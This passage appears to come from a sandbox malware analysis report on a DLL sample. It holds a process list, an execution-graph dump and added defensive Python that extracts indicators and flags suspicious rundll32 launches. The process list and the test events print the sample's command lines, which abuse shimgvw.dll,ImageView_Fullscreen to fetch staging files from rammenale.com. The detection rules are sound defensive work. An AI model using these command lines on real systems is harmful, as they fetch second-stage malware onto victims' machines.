              2024-08-29 04:53:04 UTC | 299 | IN | Data Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
              Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content
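
              The five sessions above all have the same shape: a WOW64 rundll32.exe process sends a GET for /for2/regit.tmp or /for2/aclog.txt on rammenale.com (decrypted TLS to port 443) with an IE7-compatibility user agent, and the server answers 404 with its generic LiteSpeed error page, so no second stage was retrieved during this run. The Python below is an added example, not part of the Joe Sandbox report, that turns one such exchange into the record a defender would keep: the absolute URL, the response status and size, whether anything was actually delivered, and why the user-agent string does not fit the process that sent it (the report's own "Uses a known web browser user agent for HTTP communication" signature). The request and response are re-typed here as constructed sample text with CRLF line endings; the finding name and the "payload delivered" heuristic are this example's own.

```python
"""Pull defender-facing indicators out of one decrypted HTTPS exchange from the capture."""
from __future__ import annotations
import re
from dataclasses import dataclass

# Constructed sample: the session 1 request and response above, re-typed with the CRLF
# line endings the capture view drops (the alt-svc header is omitted for brevity).
SAMPLE_REQUEST = (
    "GET /for2/regit.tmp HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; "
    ".NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)\r\n"
    "Host: rammenale.com\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
)
SAMPLE_RESPONSE = (
    "HTTP/1.1 404 Not Found\r\n"
    "Connection: close\r\n"
    "cache-control: private, no-cache, no-store, must-revalidate, max-age=0\r\n"
    "pragma: no-cache\r\n"
    "content-type: text/html\r\n"
    "content-length: 1251\r\n"
    "date: Thu, 29 Aug 2024 04:53:02 GMT\r\n"
    "server: LiteSpeed\r\n"
    "\r\n"
)
# Constructed control: a current Chromium-style browser string that should raise nothing.
BROWSER_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
              "(KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36")


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: dict[str, str]


@dataclass
class HttpResponse:
    status: int
    reason: str
    headers: dict[str, str]


def _parse_head(raw: str) -> tuple[str, dict[str, str]]:
    """Split the head of an HTTP/1.x message into its start line and lowercase-keyed headers."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def parse_request(raw: str) -> HttpRequest:
    start, headers = _parse_head(raw)
    method, path, _version = start.split(" ", 2)
    return HttpRequest(method, path, headers)


def parse_response(raw: str) -> HttpResponse:
    start, headers = _parse_head(raw)
    _version, status, reason = start.split(" ", 2)
    return HttpResponse(int(status), reason, headers)


def request_url(req: HttpRequest, scheme: str = "https") -> str:
    """Rebuild the absolute URL. The capture is decrypted TLS to port 443, hence https."""
    return f"{scheme}://{req.headers['host']}{req.path}"


MSIE_RE = re.compile(r"MSIE (\d+)\.\d+; Windows NT (\d+)\.\d+")


def user_agent_findings(ua: str) -> list[str]:
    """Heuristic checks on a User-Agent string; the finding name is this example's own."""
    findings: list[str] = []
    m = MSIE_RE.search(ua)
    if m and int(m.group(1)) <= 7 and int(m.group(2)) >= 10:
        # IE7 never ran on Windows NT 10.0. A string like this is the IE-compatibility
        # value Windows HTTP components hand to applications that set none of their own,
        # so it points at a non-browser process (here rundll32.exe) doing the fetch.
        findings.append("legacy MSIE token on Windows NT 10+")
    return findings


def summarize(req_raw: str, resp_raw: str) -> dict:
    """One record per session: what was asked for, what came back, and why the UA is odd."""
    req, resp = parse_request(req_raw), parse_response(resp_raw)
    return {
        "url": request_url(req),
        "status": resp.status,
        "content_type": resp.headers.get("content-type", ""),
        "content_length": int(resp.headers.get("content-length", "0")),
        # Heuristic: only a 200 counts as a delivered stage. A 404 is the host's error
        # page, so nothing was staged in this run and the DLL's next step was not observed.
        "payload_delivered": resp.status == 200,
        "user_agent_findings": user_agent_findings(req.headers.get("user-agent", "")),
    }


if __name__ == "__main__":
    print(summarize(SAMPLE_REQUEST, SAMPLE_RESPONSE))
```

              Run it and the record for session 1 comes out as the URL https://rammenale.com/for2/regit.tmp, status 404, a 1251-byte text/html body, payload_delivered False and one user-agent finding. The practical caveat is the 404: the staging paths were dead (or gated) at analysis time, so the absence of a dropped second stage in this report says nothing about what the DLL does when the server answers 200.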


              Target ID:0
              Start time:00:52:58
              Start date:29/08/2024
              Path:C:\Windows\System32\loaddll32.exe
              Wow64 process (32bit):true
              Commandline:loaddll32.exe "C:\Users\user\Desktop\QEydjQdRxs.dll"
              Imagebase:0x810000
              File size:126'464 bytes
              MD5 hash:51E6071F9CBA48E79F10C84515AAE618
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:1
              Start time:00:52:58
              Start date:29/08/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6d64d0000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:2
              Start time:00:52:58
              Start date:29/08/2024
              Path:C:\Windows\SysWOW64\cmd.exe
              Wow64 process (32bit):true
              Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\QEydjQdRxs.dll",#1
              Imagebase:0x790000
              File size:236'544 bytes
              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:3
              Start time:00:52:58
              Start date:29/08/2024
              Path:C:\Windows\SysWOW64\rundll32.exe
              Wow64 process (32bit):true
              Commandline:rundll32.exe C:\Users\user\Desktop\QEydjQdRxs.dll,mydllmain
              Imagebase:0x540000
              File size:61'440 bytes
              MD5 hash:889B99C52A60DD49227C5E485A016679
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:4
              Start time:00:52:58
              Start date:29/08/2024
              Path:C:\Windows\SysWOW64\rundll32.exe
              Wow64 process (32bit):true
              Commandline:rundll32.exe "C:\Users\user\Desktop\QEydjQdRxs.dll",#1
              Imagebase:0x540000
              File size:61'440 bytes
              MD5 hash:889B99C52A60DD49227C5E485A016679
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:5
              Start time:00:52:58
              Start date:29/08/2024
              Path:C:\Windows\SysWOW64\rundll32.exe
              Wow64 process (32bit):true
              Commandline:rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
              Imagebase:0x540000
              File size:61'440 bytes
              MD5 hash:889B99C52A60DD49227C5E485A016679
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:false

              Target ID:6
              Start time:00:52:58
              Start date:29/08/2024
              Path:C:\Windows\SysWOW64\rundll32.exe
              Wow64 process (32bit):true
              Commandline:rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
              Imagebase:0x540000
              File size:61'440 bytes
              MD5 hash:889B99C52A60DD49227C5E485A016679
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:false

              Target ID:7
              Start time:00:52:58
              Start date:29/08/2024
              Path:C:\Windows\SysWOW64\rundll32.exe
              Wow64 process (32bit):true
              Commandline:rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
              Imagebase:0x540000
              File size:61'440 bytes
              MD5 hash:889B99C52A60DD49227C5E485A016679
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:false

              Target ID:8
              Start time:00:52:58
              Start date:29/08/2024
              Path:C:\Windows\SysWOW64\rundll32.exe
              Wow64 process (32bit):true
              Commandline:rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
              Imagebase:0x540000
              File size:61'440 bytes
              MD5 hash:889B99C52A60DD49227C5E485A016679
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:false

              Target ID:11
              Start time:00:53:01
              Start date:29/08/2024
              Path:C:\Windows\SysWOW64\rundll32.exe
              Wow64 process (32bit):true
              Commandline:rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
              Imagebase:0x540000
              File size:61'440 bytes
              MD5 hash:889B99C52A60DD49227C5E485A016679
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:false

              Target ID:12
              Start time:00:53:01
              Start date:29/08/2024
              Path:C:\Windows\SysWOW64\rundll32.exe
              Wow64 process (32bit):true
              Commandline:rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
              Imagebase:0x540000
              File size:61'440 bytes
              MD5 hash:889B99C52A60DD49227C5E485A016679
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:false
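
              The process list above is the evidence behind the Sigma hits listed at the top of the report: the sample's export is run through rundll32.exe (by name as mydllmain and by ordinal as #1), and it then spawns further rundll32.exe instances that load the legitimate Windows image viewer shimgvw.dll and call ImageView_Fullscreen with a URL instead of a local image path, which is what produced the HTTPS requests to rammenale.com. The Python below is an added example, not the report's or Joe Sandbox's code, that applies three rules to process-creation events carrying an image path and a command line (the shape of Sysmon event 1 or Security event 4688). The events are constructed from the command lines above plus one benign control, target 99, that opens a local .jpg the documented way; the rule names are hypothetical.

```python
"""Flag the rundll32 patterns seen in the process list from process-creation events."""
from __future__ import annotations
import re

# Constructed events: (target id, image path, command line) copied from the process
# list above, plus target 99, a benign control that opens a local picture the
# way shimgvw.dll,ImageView_Fullscreen is normally used.
EVENTS = [
    (0, r"C:\Windows\System32\loaddll32.exe",
     r'loaddll32.exe "C:\Users\user\Desktop\QEydjQdRxs.dll"'),
    (2, r"C:\Windows\SysWOW64\cmd.exe",
     r'cmd.exe /C rundll32.exe "C:\Users\user\Desktop\QEydjQdRxs.dll",#1'),
    (3, r"C:\Windows\SysWOW64\rundll32.exe",
     r"rundll32.exe C:\Users\user\Desktop\QEydjQdRxs.dll,mydllmain"),
    (4, r"C:\Windows\SysWOW64\rundll32.exe",
     r'rundll32.exe "C:\Users\user\Desktop\QEydjQdRxs.dll",#1'),
    (5, r"C:\Windows\SysWOW64\rundll32.exe",
     r"rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt"),
    (7, r"C:\Windows\SysWOW64\rundll32.exe",
     r"rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp"),
    (99, r"C:\Windows\System32\rundll32.exe",
     r"rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen C:\Users\user\Pictures\holiday.jpg"),
]

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
IMAGEVIEW_RE = re.compile(r"shimgvw\.dll\s*,\s*ImageView_Fullscreen\s+(\S+)", re.IGNORECASE)
ORDINAL_RE = re.compile(r",\s*#\d+")
IMAGE_EXTS = (".jpg", ".jpeg", ".png", ".gif", ".bmp", ".tif", ".tiff")


def evaluate(image: str, cmdline: str) -> list[str]:
    """Return the names of the rules the event matches (empty list for no match).

    Rules fire on the rundll32.exe process itself, not on a parent whose command
    line merely mentions rundll32 (target 2, cmd.exe, stays quiet for that reason;
    its child, target 4, is the one that gets evaluated).
    """
    if not image.lower().endswith("\\rundll32.exe"):
        return []
    hits: list[str] = []
    # Rule 1: rundll32 handed a URL on its command line. Ordinary invocations take
    # local paths; a URL argument is what let the sample reach rammenale.com.
    if URL_RE.search(cmdline):
        hits.append("rundll32_url_argument")
    # Rule 2: shimgvw.dll,ImageView_Fullscreen with something other than an image file.
    m = IMAGEVIEW_RE.search(cmdline)
    if m and not m.group(1).strip('"').lower().endswith(IMAGE_EXTS):
        hits.append("shimgvw_imageview_non_image_argument")
    # Rule 3: export called by ordinal (",#1"). Low severity on its own, since sandboxes
    # and some installers do this too, but it keeps the export name out of the log.
    if ORDINAL_RE.search(cmdline):
        hits.append("rundll32_ordinal_export")
    return hits


def scan(events) -> dict[int, list[str]]:
    """Map each target id to its rule hits, keeping only events that matched something."""
    results: dict[int, list[str]] = {}
    for target_id, image, cmdline in events:
        hits = evaluate(image, cmdline)
        if hits:
            results[target_id] = hits
    return results


if __name__ == "__main__":
    for target_id, hits in scan(EVENTS).items():
        print(f"target {target_id}: {', '.join(hits)}")
```

              On the constructed events, targets 5 and 7 trip rules 1 and 2, target 4 trips rule 3, and targets 0, 2, 3 and 99 produce nothing. Rule 2 is the one worth keeping in production: the image viewer is a signed, expected DLL, so a rule keyed only on the DLL name would be noisy, while a non-image argument to ImageView_Fullscreen has no legitimate use.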


                Execution Graph

                Execution Coverage:3.1%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:5.4%
                Total number of Nodes:2000
                Total number of Limit Nodes:33
                execution_graph 16504 6b934b07 16505 6b934b20 16504->16505 16506 6b934b3e 16504->16506 16505->16506 16507 6b930308 44 API calls 16505->16507 16508 6b930258 2 API calls 16505->16508 16507->16505 16508->16505 16055 6b924e89 16056 6b924e92 16055->16056 16057 6b924e97 16055->16057 16076 6b92508a 16056->16076 16061 6b924d53 16057->16061 16063 6b924d5f __FrameHandler3::FrameUnwindToState 16061->16063 16062 6b924d88 dllmain_raw 16064 6b924da2 dllmain_crt_dispatch 16062->16064 16065 6b924d6e 16062->16065 16063->16062 16063->16065 16066 6b924d83 16063->16066 16064->16065 16064->16066 16067 6b921000 __DllMainCRTStartup@12 130 API calls 16066->16067 16068 6b924dc3 16067->16068 16069 6b924df4 16068->16069 16072 6b921000 __DllMainCRTStartup@12 130 API calls 16068->16072 16069->16065 16070 6b924dfd dllmain_crt_dispatch 16069->16070 16070->16065 16071 6b924e10 dllmain_raw 16070->16071 16071->16065 16073 6b924ddb 16072->16073 16074 6b924ca3 __DllMainCRTStartup@12 150 API calls 16073->16074 16075 6b924de9 dllmain_raw 16074->16075 16075->16069 16077 6b9250a0 16076->16077 16079 6b9250a9 16077->16079 16080 6b92503d GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 16077->16080 16079->16057 16080->16079 17221 6b92cc31 17222 6b931e26 ___scrt_uninitialize_crt 68 API calls 17221->17222 17223 6b92cc39 17222->17223 17231 6b931ad4 17223->17231 17225 6b92cc3e 17226 6b931e2f __DllMainCRTStartup@12 14 API calls 17225->17226 17227 6b92cc4d RtlDeleteCriticalSection 17226->17227 17227->17225 17228 6b92cc68 17227->17228 17229 6b930444 __freea 14 API calls 17228->17229 17230 6b92cc73 17229->17230 17232 6b931ae0 __FrameHandler3::FrameUnwindToState 17231->17232 17241 6b93351f RtlEnterCriticalSection 17232->17241 17234 6b931aeb 17235 6b931b57 17234->17235 17238 6b931b2b RtlDeleteCriticalSection 17234->17238 17239 6b92cec7 __DllMainCRTStartup@12 69 API calls 17234->17239 17242 6b931b76 17235->17242 17240 6b930444 __freea 14 API calls 17238->17240 
17239->17234 17240->17234 17241->17234 17245 6b933567 RtlLeaveCriticalSection 17242->17245 17244 6b931b63 17244->17225 17245->17244 16096 6b9269a4 16097 6b9269bb 16096->16097 16100 6b92ed44 16097->16100 16111 6b934c7b 16100->16111 16104 6b92ed5e IsProcessorFeaturePresent 16106 6b92ed6a 16104->16106 16105 6b92ed54 16105->16104 16110 6b92ed7d 16105->16110 16141 6b92dcfd 16106->16141 16147 6b92e4c9 16110->16147 16150 6b934ba9 16111->16150 16114 6b934cc0 16119 6b934ccc __FrameHandler3::FrameUnwindToState 16114->16119 16115 6b92f5e8 __dosmaperr 14 API calls 16123 6b934cfd __FrameHandler3::FrameUnwindToState 16115->16123 16116 6b934d1c 16118 6b930431 __dosmaperr 14 API calls 16116->16118 16117 6b934d2e __FrameHandler3::FrameUnwindToState 16120 6b934d64 __FrameHandler3::FrameUnwindToState 16117->16120 16161 6b93351f RtlEnterCriticalSection 16117->16161 16121 6b934d21 16118->16121 16119->16115 16119->16116 16119->16117 16119->16123 16126 6b934da1 16120->16126 16127 6b934e9e 16120->16127 16137 6b934dcf 16120->16137 16124 6b92def9 ___std_exception_copy 39 API calls 16121->16124 16123->16116 16123->16117 16140 6b934d06 16123->16140 16124->16140 16132 6b92f497 _unexpected 39 API calls 16126->16132 16126->16137 16128 6b934ea9 16127->16128 16166 6b933567 RtlLeaveCriticalSection 16127->16166 16131 6b92e4c9 __FrameHandler3::FrameUnwindToState 21 API calls 16128->16131 16133 6b934eb1 16131->16133 16134 6b934dc4 16132->16134 16136 6b92f497 _unexpected 39 API calls 16134->16136 16135 6b92f497 _unexpected 39 API calls 16138 6b934e24 16135->16138 16136->16137 16162 6b934e4a 16137->16162 16139 6b92f497 _unexpected 39 API calls 16138->16139 16138->16140 16139->16140 16140->16105 16142 6b92dd19 __fread_nolock __FrameHandler3::FrameUnwindToState 16141->16142 16143 6b92dd45 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16142->16143 16146 6b92de16 __FrameHandler3::FrameUnwindToState 16143->16146 16144 6b924ad5 _ValidateLocalCookies 5 API calls 16145 6b92de34 
16144->16145 16145->16110 16146->16144 16148 6b92e306 __FrameHandler3::FrameUnwindToState 21 API calls 16147->16148 16149 6b92e4da 16148->16149 16151 6b934bb5 __FrameHandler3::FrameUnwindToState 16150->16151 16156 6b93351f RtlEnterCriticalSection 16151->16156 16153 6b934bc3 16157 6b934c05 16153->16157 16156->16153 16160 6b933567 RtlLeaveCriticalSection 16157->16160 16159 6b92ed49 16159->16105 16159->16114 16160->16159 16161->16120 16163 6b934e16 16162->16163 16164 6b934e4e 16162->16164 16163->16135 16163->16138 16163->16140 16167 6b933567 RtlLeaveCriticalSection 16164->16167 16166->16128 16167->16163 13743 6b924b49 13744 6b924b87 13743->13744 13745 6b924b54 13743->13745 13782 6b924ca3 13744->13782 13747 6b924b79 13745->13747 13748 6b924b59 13745->13748 13755 6b924b9c 13747->13755 13750 6b924b5e 13748->13750 13751 6b924b6f 13748->13751 13754 6b924b63 13750->13754 13769 6b9251de 13750->13769 13774 6b9251bf 13751->13774 13756 6b924ba8 __FrameHandler3::FrameUnwindToState 13755->13756 13809 6b92524f 13756->13809 13758 6b924baf __DllMainCRTStartup@12 13759 6b924bd6 13758->13759 13760 6b924c9b 13758->13760 13766 6b924c12 ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState 13758->13766 13820 6b9251b1 13759->13820 13828 6b9253ee IsProcessorFeaturePresent 13760->13828 13763 6b924ca2 13764 6b924be5 __RTC_Initialize 13764->13766 13823 6b9250d5 RtlInitializeSListHead 13764->13823 13766->13754 13767 6b924bf3 13767->13766 13824 6b925186 13767->13824 14106 6b92ecbe 13769->14106 14312 6b92671c 13774->14312 13779 6b9251db 13779->13754 13780 6b926727 21 API calls 13781 6b9251c8 13780->13781 13781->13754 13783 6b924caf __FrameHandler3::FrameUnwindToState __DllMainCRTStartup@12 13782->13783 13784 6b924ce0 13783->13784 13785 6b924d4b 13783->13785 13801 6b924cb8 13783->13801 14337 6b92521f 13784->14337 13786 6b9253ee __DllMainCRTStartup@12 4 API calls 13785->13786 13791 6b924d52 __FrameHandler3::FrameUnwindToState 13786->13791 13788 6b924ce5 14346 6b9250e1 
Execution Graph (rendered call graph; the node/edge dump is not reproduced here)

Recoverable from the graph text: nodes are basic-block addresses in the loaded image (0x6b921000 through 0x6b935941) plus resolved symbol names; edges are numbered node-to-node transitions. Most nodes are MSVC CRT/VCRuntime internals (__DllMainCRTStartup@12, dllmain_raw, dllmain_crt_dispatch, __RTC_Initialize, __FrameHandler3::FrameUnwindToState, ___vcrt_FlsGetValue/___vcrt_FlsSetValue, __vfwprintf_l, __freea, __dosmaperr, ___std_exception_copy, _ValidateLocalCookies) and their expected Win32 calls (IsProcessorFeaturePresent, Tls*/Fls*, critical-section, heap, GetStdHandle/GetFileType, GetStartupInfoW, GetLastError/SetLastError, LoadLibraryExW/FreeLibrary, RaiseException).

Edges from the non-CRT region (0x6b921000-0x6b924ad5) show the sample's own control flow after DllMain:
- 0x6b92171f: GetModuleHandleW followed by three GetProcAddress calls (imports resolved at runtime rather than via the import table).
- 0x6b924402: GetEnvironmentVariableW, then repeated string building (_strlen) between calls into the CRT formatting routines.
- 0x6b92192f: two CreateProcessW call sites, followed by two consecutive Sleep calls (matches "Creates a process in suspended mode" and "May sleep (evasive loops)" in Signatures).
- 0x6b921b85: FindFirstFileW/FindNextFileW enumeration loop; inside it ExpandEnvironmentStringsW, CopyFileW, and TerminateProcess with two CloseHandle calls, i.e. files are copied and a child process is terminated per iteration.
- 0x6b922430: CoInitialize with VariantInit/VariantClear/SysFreeString pairs (COM automation use; the target interface is not named in the graph).
- 0x6b921017: ExitProcess reached directly from the DllMain path, and a SetUnhandledExceptionFilter/UnhandledExceptionFilter/GetCurrentProcess/TerminateProcess chain at 0x6b924edc (consistent with IsDebuggerPresent checks noted in Signatures).

Nodes reached via unresolved call targets (e.g. 76CCE550, 76C9D120) are system DLL addresses the graph did not symbolize; no further detail is available from the dump.
RaiseException 15133->15135 15136 6b9240ce 15134->15136 15135->15134 15137 6b9240e5 15136->15137 15138 6b9240da 15136->15138 15140 6b923f70 15137->15140 15141 6b92139b __DllMainCRTStartup@12 RaiseException RtlEnterCriticalSection RtlLeaveCriticalSection 15137->15141 15139 6b92411f __DllMainCRTStartup@12 40 API calls 15138->15139 15139->15140 15140->15088 15141->15140 15143 6b923ccb __DllMainCRTStartup@12 15142->15143 15146 6b923d6a 15143->15146 15145 6b923ce2 15145->14746 15151 6b923f02 15146->15151 15150 6b923db1 __DllMainCRTStartup@12 15150->15145 15152 6b923f14 15151->15152 15153 6b923d7e 15151->15153 15168 6b923f1d 15152->15168 15153->15150 15155 6b923f85 15153->15155 15156 6b923c50 __DllMainCRTStartup@12 5 API calls 15155->15156 15157 6b923faf 15156->15157 15158 6b923fbc 15157->15158 15159 6b92142c __DllMainCRTStartup@12 40 API calls 15157->15159 15160 6b923c2b __DllMainCRTStartup@12 5 API calls 15158->15160 15159->15158 15161 6b923fd9 __DllMainCRTStartup@12 15160->15161 15162 6b923f56 __DllMainCRTStartup@12 40 API calls 15161->15162 15163 6b923ff3 __DllMainCRTStartup@12 15162->15163 15165 6b92405b __DllMainCRTStartup@12 15163->15165 15176 6b92377a 15163->15176 15166 6b924ad5 _ValidateLocalCookies 5 API calls 15165->15166 15167 6b92409d 15166->15167 15167->15150 15171 6b9248d3 15168->15171 15172 6b924856 std::invalid_argument::invalid_argument 39 API calls 15171->15172 15173 6b9248e4 15172->15173 15174 6b926486 std::_Xinvalid_argument RaiseException 15173->15174 15175 6b9248f2 15174->15175 15179 6b923839 15176->15179 15180 6b923bd2 __DllMainCRTStartup@12 39 API calls 15179->15180 15181 6b9237ac 15180->15181 15181->15165 15184 6b9234e1 __DllMainCRTStartup@12 15182->15184 15183 6b923525 __DllMainCRTStartup@12 15183->14750 15184->15183 15185 6b92377a __DllMainCRTStartup@12 39 API calls 15184->15185 15185->15183 15187 6b9232aa __DllMainCRTStartup@12 15186->15187 15190 6b92359b 15187->15190 15189 6b9232be 15189->14486 15191 6b9235f4 15190->15191 15193 6b9235af 
__DllMainCRTStartup@12 15190->15193 15194 6b923ae0 15191->15194 15193->15189 15195 6b923c50 __DllMainCRTStartup@12 5 API calls 15194->15195 15196 6b923afb 15195->15196 15197 6b923b05 15196->15197 15198 6b92142c __DllMainCRTStartup@12 40 API calls 15196->15198 15199 6b923c2b __DllMainCRTStartup@12 5 API calls 15197->15199 15198->15197 15200 6b923b19 __DllMainCRTStartup@12 15199->15200 15201 6b923f56 __DllMainCRTStartup@12 40 API calls 15200->15201 15202 6b923b33 __DllMainCRTStartup@12 15201->15202 15203 6b92377a __DllMainCRTStartup@12 39 API calls 15202->15203 15204 6b923b80 __DllMainCRTStartup@12 15202->15204 15203->15204 15205 6b924ad5 _ValidateLocalCookies 5 API calls 15204->15205 15206 6b923ba8 15205->15206 15206->15193 15208 6b9210df __vfwprintf_l 15207->15208 15245 6b9210a2 15208->15245 15212 6b923421 __DllMainCRTStartup@12 15211->15212 15281 6b9239e9 15212->15281 15215 6b9223ce 15216 6b9223f4 __DllMainCRTStartup@12 15215->15216 15217 6b92240b ExpandEnvironmentStringsW 15216->15217 15218 6b92329b __DllMainCRTStartup@12 40 API calls 15217->15218 15219 6b922421 15218->15219 15220 6b924ad5 _ValidateLocalCookies 5 API calls 15219->15220 15221 6b92242e 15220->15221 15222 6b921654 VariantInit 15221->15222 15222->14772 15223->14775 15224->14777 15225->14781 15226->14783 15227->14785 15228->14787 15229->14789 15292 6b92139b 15230->15292 15232 6b921485 __DllMainCRTStartup@12 15234 6b9214a8 __DllMainCRTStartup@12 15232->15234 15295 6b921543 SysAllocString 15232->15295 15234->14797 15306 6b921522 15235->15306 15246 6b9210b6 __vfwprintf_l 15245->15246 15249 6b92c687 15246->15249 15250 6b92c69b __vfwprintf_l 15249->15250 15251 6b92c6bd 15250->15251 15253 6b92c6e4 15250->15253 15252 6b92de7c __vfwprintf_l 29 API calls 15251->15252 15254 6b92c6d8 15252->15254 15258 6b9281ef 15253->15258 15256 6b927d4e __vfwprintf_l 39 API calls 15254->15256 15257 6b9210c0 76C9D120 15256->15257 15257->14765 15259 6b9281fb __FrameHandler3::FrameUnwindToState 15258->15259 15266 6b92cc7d 
RtlEnterCriticalSection 15259->15266 15261 6b928209 15267 6b92a16d 15261->15267 15266->15261 15268 6b9313fe __vfwprintf_l 40 API calls 15267->15268 15269 6b92a194 __vfwprintf_l 15268->15269 15270 6b92a46b __vfwprintf_l 44 API calls 15269->15270 15271 6b92a1db 15270->15271 15272 6b92a12f __vfwprintf_l 14 API calls 15271->15272 15273 6b92a1e8 15272->15273 15274 6b9314a9 __vfwprintf_l 64 API calls 15273->15274 15275 6b92a1f5 15274->15275 15276 6b924ad5 _ValidateLocalCookies 5 API calls 15275->15276 15277 6b928216 15276->15277 15278 6b92823e 15277->15278 15279 6b92cc91 __fread_nolock RtlLeaveCriticalSection 15278->15279 15280 6b928227 15279->15280 15280->15254 15282 6b923c50 __DllMainCRTStartup@12 5 API calls 15281->15282 15283 6b923a0a 15282->15283 15284 6b92142c __DllMainCRTStartup@12 40 API calls 15283->15284 15285 6b923a14 __DllMainCRTStartup@12 15283->15285 15284->15285 15286 6b923c2b __DllMainCRTStartup@12 5 API calls 15285->15286 15291 6b923a3a __DllMainCRTStartup@12 15285->15291 15287 6b923a7c 15286->15287 15288 6b923f56 __DllMainCRTStartup@12 40 API calls 15287->15288 15288->15291 15289 6b924ad5 _ValidateLocalCookies 5 API calls 15290 6b922500 15289->15290 15290->15215 15291->15289 15297 6b924ae8 15292->15297 15296 6b921571 __DllMainCRTStartup@12 15295->15296 15296->15234 15299 6b924aed ___std_exception_copy 15297->15299 15298 6b9213a6 15298->15232 15299->15298 15300 6b92df8f _unexpected 2 API calls 15299->15300 15301 6b924b09 __DllMainCRTStartup@12 15299->15301 15300->15299 15302 6b92501f __DllMainCRTStartup@12 15301->15302 15304 6b926486 std::_Xinvalid_argument RaiseException 15301->15304 15303 6b926486 std::_Xinvalid_argument RaiseException 15302->15303 15305 6b92503c 15303->15305 15304->15302 15307 6b9214f6 15306->15307 15308 6b921531 15306->15308 15307->14803 15307->14804 15310 6b921588 15308->15310 15311 6b9215ba 15310->15311 15312 6b9215a4 15310->15312 15311->15307 15312->15311 15314 6b9215c8 15312->15314 15317 6b9215fe 15314->15317 15316 6b9215d7 
